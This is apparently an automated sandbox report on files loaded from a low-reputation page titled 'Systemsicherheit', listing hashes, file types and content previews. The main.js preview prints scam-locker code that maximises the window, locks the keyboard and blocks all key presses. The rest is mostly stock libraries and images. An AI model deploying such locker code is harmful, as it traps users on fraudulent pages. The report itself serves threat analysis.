                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/js/bootstrap.min.js
                                                        Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function s(){return(s=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Objec
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1065)
                                                        Category:downloaded
                                                        Size (bytes):25739
                                                        Entropy (8bit):4.672979298853769
                                                        Encrypted:false
                                                        SSDEEP:768:D5zU9Cb4s1QWOfVjVNj6EnN9zpaPJUkzjFpdZ:D5zECb4s1hOfRHZ99SpdZ
                                                        MD5:05835DA15B08B6BD679DE3CA80861266
                                                        SHA1:7B03D9F7F5E89A6E49358A50B94BE8E64BEC36FF
                                                        SHA-256:8270C79F0CA574715FDE60DFE6EB0B711159CFC787C8EEE66B5552C78FE28A4B
                                                        SHA-512:4F93341FA854BFBEE07CECA7A7F678777FE38CF724BE599A14A7E295134194A6B7FC4AEBA6BD5231E6E2CC5E1864A718091BE2CE2DCA3FCC1AB0AA816F928C17
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE
                                                        Preview:<html lang="en"><head><meta charset="utf-8">. <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">. <meta content="noindex,nofollow" name="robots">. <title>Systemsicherheit</title>. <link href="w3" rel="icon" id="favicon" type="image/png">. <link href="css/tapa.css" rel="stylesheet">. <link href="css/bootstrap.min.css" <link="" type="text/css" rel="stylesheet">.<script src="js/jquery.min.js"></script>.<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>.<link rel="stylesheet" href="css/font-awesome.min.css">.<script src="js/jquery.min.js"></script>.<script src="js/main.js"></script>.<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>.<link rel="stylesheet" href="css/font-awesome.min.css">.... <script src="js/emojione.min.js" type="text/javascript" async="" defer=""></script><script src="js/emojione.min.js" type="text/javascript" async="" defer=""></script><style type="text/css">@keyfr
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 834 x 40, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):4097
                                                        Entropy (8bit):7.848153220596051
                                                        Encrypted:false
                                                        SSDEEP:96:LXSDZ/I09Da01l+gmkyTt6Hk8nTSVmnLCrpCgWham:LXSDS0tKg9E05TSWLAiN
                                                        MD5:B57BBDBC31F12D43ED973B8A7E43EA3A
                                                        SHA1:E83CCAD4CD922E7E7C4D51CE1D4FD6D06EA0D02E
                                                        SHA-256:07394C92F7535B0D833FDC2413B5089C9777D4ED679FE13032851369FC0D5226
                                                        SHA-512:32AA3A2C0C558B95FD1CFF5B7E5BF0D866845560ECE8A05D7EEDFE7892934E7EAC6FC8731F228747828A189ECD8475B40CD6C51FBD19BA9A4B05D856C10CFB35
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...B...(.......J.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                        Category:dropped
                                                        Size (bytes):1609
                                                        Entropy (8bit):5.267116199711405
                                                        Encrypted:false
                                                        SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xDUwS8f:3qD+2+pUAew85zsDUnA
                                                        MD5:716E330272188750C9E9967A9339D968
                                                        SHA1:193FC7CFB7F2F3737AF5E319D12DF05553A18CDF
                                                        SHA-256:97FDC7A730DAE5B905E9DE6D6BB33E82FF0E7F7CEC051C838A446EFEBB8FF9F3
                                                        SHA-512:A0354910391D562B38743839BC06910192524B92AD72C2F392D323271715CD9BA702F3FDB15FAFEEEB112356AC96C2902DFA63E269991833E3F4C64A23C04297
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:downloaded
                                                        Size (bytes):87533
                                                        Entropy (8bit):5.262536918435756
                                                        Encrypted:false
                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                        MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                        SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                        SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                        SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js
                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1200 x 1260, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):35689
                                                        Entropy (8bit):7.658233342225225
                                                        Encrypted:false
                                                        SSDEEP:768:+dk7X7ai/932LWKhxepn/1eKWrJznfCfjlwXYyD0ixKuxMUH:+dsQSKhxOQKWrJznf6JnIxUuxDH
                                                        MD5:25FB1B036A658D3B2CA359031483B7B2
                                                        SHA1:DBD4896260D75CD28031479E1495B82DBBA0F726
                                                        SHA-256:426EEC34428CA37958C3697503680648F7D9658AE0FE6300E80DDC17797CEB85
                                                        SHA-512:BD1273B94DE729DFA0AFEAD57A5A62CC08862203DFADC3F1D2FFB63907FECB65CEF1F0961CA0B0B21ED87F27125EFB7F67C1603637890F1EDC9AF2634474DFCB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR..............m{C....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...y..W]'..y.zM.b.Q.....a.#..e`.T.E3n.2H...CW.F).C.;...DE.\F.."..3,....*.$@.. {wW/U.....Y.rk..>..~." MU..]...=.I.............................................................................................................................`U.......>1I.~.H.&.....$.,.`.L.Y...........i.I...&.....6k.zc[...zcjnJSoJ[o..s9...xoj..K.....I.}....h....$.H..%..6.jj.J.rU..+._..e^...JS`....9.<!..>8iNI.)Mm.\KyPj....IN^.........=kv...Z...K.N..\QJ.o.+.ry.......:....0...`....)k.d.nk.lJi.\SNIrJ..Ro..55%..gV..u...,.W[...S..5.~2Z......LN_}.r..\..^.#k..y...'......X...>1u.DJ..i.).............Vm0.&.S2{..U.n.O..k..o.[m..#....I.....M.'..M.....L.J.......p...4.'R.7%....yXjNL.&.T.T,@=!.#k..,...u>...dzoI....M.'..KLl..hS`..w.....<"....%yx..$m.$UI..'$yTM.U.-...dr..I.xM.D.|".|"..|U^.0..X.0.^t..3WOk.Vk9-%.%...0..;).].'.h..LN.-.|.4.x..H..../....G.......~G...0..V....Gf
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 31 x 30, 4-bit colormap, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):168
                                                        Entropy (8bit):5.414614498746933
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlKhhmtloZN8s02V42/uDlhlMmI/5DUZfm4XM43ialaRAFRFlvHBlv+:6v/lhPemtl6Q2B/6TfI5IZfmYSal86RC
                                                        MD5:ACB05EBCD5F488FC99169CFF02B6DD04
                                                        SHA1:DCA893A7B514503E947A57AA072482A0E0CBA912
                                                        SHA-256:1AB5EF4E7E196CB1FF39DF44E1A0A39F6880B906EF6FD6DA3CFDBB92FFD33115
                                                        SHA-512:13FB028E0B360C36355FBE5D98377548B6008E6939D3AC5296FD20FE7C52359183BFCA7505AD9EF7C8BFE068FB59B91850F86D4C11765746850737174EFF522E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/micro.png
                                                        Preview:.PNG........IHDR.............&......sRGB...,.....pHYs.................PLTE.P!............]2.....tRNS......../...!IDATx.c`..A%..`........1...@......"@M........IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 193 x 71
                                                        Category:dropped
                                                        Size (bytes):14751
                                                        Entropy (8bit):7.927919850442063
                                                        Encrypted:false
                                                        SSDEEP:384:NiDfi0nwQ3tIzj2nK7xnnw8/8D2gi1jqaAyLrwjWVkvY597Kk/USIZ:NMfiU3mWKVnF06gi1j6+cskvo9W6UH
                                                        MD5:6FCB78E0CD7933A70EEA2CF071F82118
                                                        SHA1:70364BFFD62FE33360ABE70ECC7F7C0541B3B54C
                                                        SHA-256:4B436B0B6A47DB85C88F83DC3FE3FD9A96C0A4018B28832165DF929DFFE0BC86
                                                        SHA-512:AF086B13F6041FED8F9457FD4FEA33B3BF4A1ED985A4EDAF8E59AD22A772652D83A619D070BEE3C81686166717526D5C2EF3097C1C088E4729FB15B09CAEA961
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89a..G............d....;.........z..|...........d..{.......p`.r.m^.{.........cqa..........u......dsc.......v.rb.{....a.........s...`.........qe.{........u...b...sh.{.........v.{..pi.......u.qi....t.ph..........r...api.z..........r.oh........z.}..{....coj.......s.{....bmn.....mp.......y...`mt.{....................................................................!..NETSCAPE2.0.....!.)Optimized with https://ezgif.com/optimize.!.......,......G......I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n.....w#..z[N..~.....................................m....W......i....X.........D.........G.../...*..!...............F.............. .V......Kwo`9...]1....u.#......(..xQ.....#z..R...%....J&([.{YC@0..i*..sb...z.<)......R..)...:..t.T.6..m.3...l..V....G[....,.j.UG..V.U...:.l.....+T0.]...&.8.....;f..1.....I ....v6.:oi"..l........K.,al.............N<x..!.......,......6......I..8...`.0ai.h..,...+.tm....|..!.n....H[.8L:.P...Z.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 12955
                                                        Category:dropped
                                                        Size (bytes):4678
                                                        Entropy (8bit):7.95886388935303
                                                        Encrypted:false
                                                        SSDEEP:96:oh/oZIFjyNZXLVy3bCc58GzKwIS6GyShxRcv7OogGgdLUv1by5EH2NB2t:8/cH5wbC0LzKwI5GLRcv7ObGCLU9GO8C
                                                        MD5:2E76F2975071A8EB95D665A06B06CAE4
                                                        SHA1:B114072AED8F53A4586F0AF59D9BCA74B59AB76F
                                                        SHA-256:396ED9BA1FC0306C7BCAB1B1265F0DC273F0E83661C49337AC053DC2DA3B8378
                                                        SHA-512:7F654277E187B5D6008CF03805C965FA28B97890B6EDEDA4259D8AB1DD487BB02F8F6FD9DECE035D1C632BC4745BA23E358B7BBB7F0A036F70FECEF7F5D273B7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Z.s.8..W$.....I.f.aT...['v.3{W.h]0.Y.P....d...5..^I.&?\....n.....i)..).........=..d..b,'.....YV..h.E.L.Z.............)5...P|Z(m.!M.15.,RA....3Z...j..I..sO.s......y.?m...T..c..0....q.....PYV.....)...b.Iq..Bh...VB.s..].".q/L......+.VJ7;e..,.BM{7.........uct&........c.H7/E.....[......V..zZ..k.......`.........>(1D.s.e.n..'1.._...N.#UqE\..7.e.......8@...Zx...-q....,A..K+d...IQ....z..O0....L...@.~.f.d$.]...v.hW.+....F....0. ...vj.H.....Z.EL.3^\=.ZX..h......$.[.g.?.kou.m.jm8..\.......#.....*F.+..$P.g.9..~\...Q..&.kU..O.0.t........0.\&b(jk.#S..q...a...<...T..N.q.9>...?"6...0R....L......b.c.....sQ,x"zZ...HC.[..ZBd-k..D..:.1.._0.I..)!j...J.Ye..._..k|,&...P.2.E..x.1...Z.e.<K.;.k.....2O-.]...*....n..........s.:ok...x&6..`,.....>`...b.g..Wf.u....g.......>;..os..?..t...BD[.....\}..........2..e*.x!x=....a...z.*...N....'.<......L.QV.w..........e.~0.n....]Q.s.?n.U.G....-.....!MB/f.^.Zlx.D..i^..........Z....$.\.......-I?[.../x2....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):67359
                                                        Entropy (8bit):5.352035171848617
                                                        Encrypted:false
                                                        SSDEEP:768:oDR8aeY7IeuemSlrl6JoUXXRuoBMALCYdPRJ2Op/Xnum7xX/FA1pFwmv6SKbyGl6:oDR+cASlrlerNjxp/Xnum7zlEb
                                                        MD5:0018B2947487CCA1596BA00A9D80130C
                                                        SHA1:F701C05D59788094B38DC8FCBBBB24219F903845
                                                        SHA-256:DC1DA692990307185621FD661B7305E29D3A0A5BA0F0D998E5A1463A17C57044
                                                        SHA-512:4411B4512287790F763F84B4C5FAE7FBF08AC6FEA39111964FA5AABB31EC7EE5051F3AF434103379A37148A65E1B354F0967AA27FD5844C4D5C7DFD416E49AA4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.clarity.ms/s/0.7.56/clarity.js
                                                        Preview:/* clarity-js v0.7.56: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return dr},get start(){return lr},get stop(){return fr},get track(){return ir}}),e=Object.freeze({__proto__:null,get clone(){return Ar},get compute(){return jr},get data(){return Tr},get keys(){return Nr},get reset(){return Rr},get start(){return Cr},get stop(){return zr},get trigger(){return Dr},get update(){return Lr}}),n=Object.freeze({__proto__:null,get check(){return qr},get compute(){return Fr},get data(){return Or},get start(){return Yr},get stop(){return Vr},get trigger(){return Ur}}),a=Object.freeze({__proto__:null,get compute(){return $r},get data(){return Br},get log(){return Qr},get reset(){return ti},get start(){return Kr},get stop(){return Zr},get updates(){return Jr}}),r=Object.freeze({__proto__:null,get callback(){return fi},get callbacks(){return ai},get clear(){return di},get consent(){return li},get data(){return ni},
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 193 x 71
                                                        Category:downloaded
                                                        Size (bytes):14751
                                                        Entropy (8bit):7.927919850442063
                                                        Encrypted:false
                                                        SSDEEP:384:NiDfi0nwQ3tIzj2nK7xnnw8/8D2gi1jqaAyLrwjWVkvY597Kk/USIZ:NMfiU3mWKVnF06gi1j6+cskvo9W6UH
                                                        MD5:6FCB78E0CD7933A70EEA2CF071F82118
                                                        SHA1:70364BFFD62FE33360ABE70ECC7F7C0541B3B54C
                                                        SHA-256:4B436B0B6A47DB85C88F83DC3FE3FD9A96C0A4018B28832165DF929DFFE0BC86
                                                        SHA-512:AF086B13F6041FED8F9457FD4FEA33B3BF4A1ED985A4EDAF8E59AD22A772652D83A619D070BEE3C81686166717526D5C2EF3097C1C088E4729FB15B09CAEA961
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/re.gif
                                                        Preview:GIF89a..G............d....;.........z..|...........d..{.......p`.r.m^.{.........cqa..........u......dsc.......v.rb.{....a.........s...`.........qe.{........u...b...sh.{.........v.{..pi.......u.qi....t.ph..........r...api.z..........r.oh........z.}..{....coj.......s.{....bmn.....mp.......y...`mt.{....................................................................!..NETSCAPE2.0.....!.)Optimized with https://ezgif.com/optimize.!.......,......G......I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n.....w#..z[N..~.....................................m....W......i....X.........D.........G.../...*..!...............F.............. .V......Kwo`9...]1....u.#......(..xQ.....#z..R...%....J&([.{YC@0..i*..sb...z.<)......R..)...:..t.T.6..m.3...l..V....G[....,.j.UG..V.U...:.l.....+T0.]...&.8.....;f..1.....I ....v6.:oi"..l........K.,al.............N<x..!.......,......6......I..8...`.0ai.h..,...+.tm....|..!.n....H[.8L:.P...Z.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 13 x 13, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):349
                                                        Entropy (8bit):7.047569859646336
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPfnY+7nDsphbAX6jNYCIh61Uw49/J3BYwmPYYSU+59AyROJwWgZPOIwCMR9:6v/74+U3AANXIsUDdI3+XtRZPONCMROO
                                                        MD5:7454C652E0733D92DE6C920C2D646AE0
                                                        SHA1:34A5BD8C7401F95E346895B0E5CCFFBF0E9AD638
                                                        SHA-256:44F752B0BD2E48052D538BC6ACA5379F3630CA64DA945F794690DDF47E8EAEF7
                                                        SHA-512:DDE6D40BEC105003CB93C52DD3322C26985FECC7FF1EAB79547FB7F0365AB2FB7B1CBA96AED81958C08627FC6C0BA6034BCEC53B1B66705D7B04202E7F8B5B59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...............s+....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.Q1.E@.e..jQ..3hTJ.J......$J..h)$B).t$._.&....).x....y.w...uu]7.......8..(.e.3MS.e.H.0.#."....Q...QU5.C.@.<...$.Bx..x.8.m.n..'r .}.....x.8..i.q.-........0..9O.A...............a.O..{.W..<......1V..0.O.....I..`.!L.....i....6.B#....~....p..Nq.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32478)
                                                        Category:downloaded
                                                        Size (bytes):84817
                                                        Entropy (8bit):5.373777901642572
                                                        Encrypted:false
                                                        SSDEEP:1536:AP1Wk7i6GUHdXXeyQazBu+4HhiO2Id0uJO1z6/A4fGAub0i4ULgGiyz4npa98Hrb:K4UdeJiz6UAIJ8pa98Hrb
                                                        MD5:20C129BEDB4A26DB02FC0F54D026C3F5
                                                        SHA1:093B9D2728788DE24A728742070A348B2848573F
                                                        SHA-256:436ECC90FAB5ED1034B68A4A0E924E0132D93D9E7FB59B4FE23018EB7D9242C1
                                                        SHA-512:1997641A1DBA92AF7C28FE67C14FC3F89C1E49BE14DD8A8903C3C5D4A4AAE6161B00BF37D02EDA6E8B45F88936C0A7871C1D465036D6F1D18C36ED8D419B78DE
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/js/jquery.min.js
                                                        Preview:/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.3",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):261
                                                        Entropy (8bit):4.303900297498265
                                                        Encrypted:false
                                                        SSDEEP:3:CFFsEEBmBEPXAxKHCvcfTNht0LBQA/dDpHsSYTbqA2FJB/QR+rcXFA/F3dNQ+5fe:C/X4QqZhaLHFDpH3YTO/JBI+dF3fQ1/
                                                        MD5:2B48F4C9307F3DF16459A0686FEAB383
                                                        SHA1:03E205C4A8E19EEB0E052FD67563249895744CCF
                                                        SHA-256:B8F9C02E8900B5A04EE582A838BCE732C69760718B49A8B78414EACC38D9789B
                                                        SHA-512:20AA4CF31655544BFD4D59C88ABA4C699268EE68CF53FEE6436DB5D1FAD5191BEAD545EA1B55B8219B131E4B45809FAD47BEBB5806BA12B8E300050D48FFEF3D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/js/main.js
                                                        Preview:.. window.onload = function() {.. window.moveTo(0, 0);.. window.resizeTo(screen.availWidth, screen.availHeight).. };.. .. navigator.keyboard.lock();.. document.onkeydown = function (e) {.. return false;.. }..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):4042
                                                        Entropy (8bit):4.803038059120053
                                                        Encrypted:false
                                                        SSDEEP:96:ngmnuf3g+hSVy5hxRWXN80GVi2v65lL6YgW+K9L:ngPf7SVuhxwXNNGVi2v65Zsp6L
                                                        MD5:D928A117C858531310B28BEBE99690C6
                                                        SHA1:F66DCD762BB0FDA155200C9523D8F4701D76E07F
                                                        SHA-256:72D421DA6D605D5F74EA72DD10C3018B756D9731B1C8B84BEE78E200D7A33F87
                                                        SHA-512:723E77EA9A49181D5B58778649AC962A1DAD2A1DB2E65C39D175D84A99937CD3D5737F1EC52E3B1EC594480BEC8898DF6C5090EA40DA38AD3B9F93B0F018C712
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"announcements":[],"eventRules":[],"features":{"revertback":true,"chat.preQualification":true,"messenger":false,"surveys.longText":true,"scramble":true,"funnels.visitors":true,"gcs":true,"requireConsentSetting":true,"key-events":true,"bigcommerce-new-app":true,"trial-guard":true,"shopify-new-app":true,"integration::google-analytics::v1":true,"integration::wordpress::v1":true,"integration::shopify::v2":true,"integration::bigcommerce::v1":true,"integrations":true,"integration::hubspot::v1":true,"send-integration-events":true,"integration::custom-notifications::v1":true,"intelligent-fingerprint":true,"trackFrames":true,"rdc":true,"store-resources":true,"paypal":true,"sessionDuration":true,"email-reports":true,"integration::zapier::v1":true,"export-button":true,"integration::square::v1":true,"shopify-checkout-pixel":true,"multiQuestionSurvey":true,"plan-pricing-page-variant":true,"conversational-discovery":true,"onboarding-benchmark":true,"recommend-plan-from-trial":true,"integration::opt
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1280x800, components 3
                                                        Category:dropped
                                                        Size (bytes):39562
                                                        Entropy (8bit):7.40852798553151
                                                        Encrypted:false
                                                        SSDEEP:768:CqhQprnDtbhfB7G1DJrMs3/mo0s0AqkSxVk3jg5h52YW:ClbziPrM2/dV0Aek3jg5JW
                                                        MD5:52EB6A3E97C9440B2A403AF6B479D7E8
                                                        SHA1:638BCD1324F7AB8555440903FA47DDF5E583622A
                                                        SHA-256:CAD543CD7CC37691AF3D7FA4A7D26040E731E971B82801E3D7A071B714B7D0CD
                                                        SHA-512:AAE736B63E51B69A5B4CE89E954DDEA56AA52CCD62B00E73739C13B73CB318A872F3D76E8B0879546721BB54285C0C9F73982DC402543F3C35EE449B14CACB3C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....H.H......ICC_PROFILE............@..mntrRGB XYZ ............acsp.......................................-Qt..................................................rXYZ........gXYZ........bXYZ........wtpt...,....cprt...@....rTRC...L... gTRC...L... bTRC...L... desc...l..._XYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ .......O........text....N/A.para..........ff......Y.......[desc........sRGB..................................................................................C....................................................................C....................................................................... ...."..................................................................................P............................................................................................................................g+W..iP..........................................................J6....m..Iwo.hvs../.k.3lo>.K...U...D...@..Zq.......2..s........;.2T.n.\.E...t
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MPEG ADTS, layer III, v2, 32 kbps, 24 kHz, Monaural
                                                        Category:downloaded
                                                        Size (bytes):154272
                                                        Entropy (8bit):7.838315438710203
                                                        Encrypted:false
                                                        SSDEEP:3072:bJDnREYEjDWSF+U6+KKOkuqWqS2WS2mL3IeYIgPK3CtpVaxCV:bJDnREYEn7fXzuFZW3IUOum
                                                        MD5:69A102BEB439E68417ADF8AD7C6DF625
                                                        SHA1:9DBEC1E5DAAFA734E2269A700F4C91156AB3C211
                                                        SHA-256:96C3F234194EC2894E563C51289CE3961B986A05C603CFB7EC00EA58E2EE3FBF
                                                        SHA-512:C1BF8491A468DDD3AC033599D69F8484B80F5127E3856B068CD97E68425E594FC00114EF64B91D88719DC7BFFC2A9D2255F0B7526AAE21D888FFA01D18505C7E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/media/grmn.mp3:2f868e97af910f:0
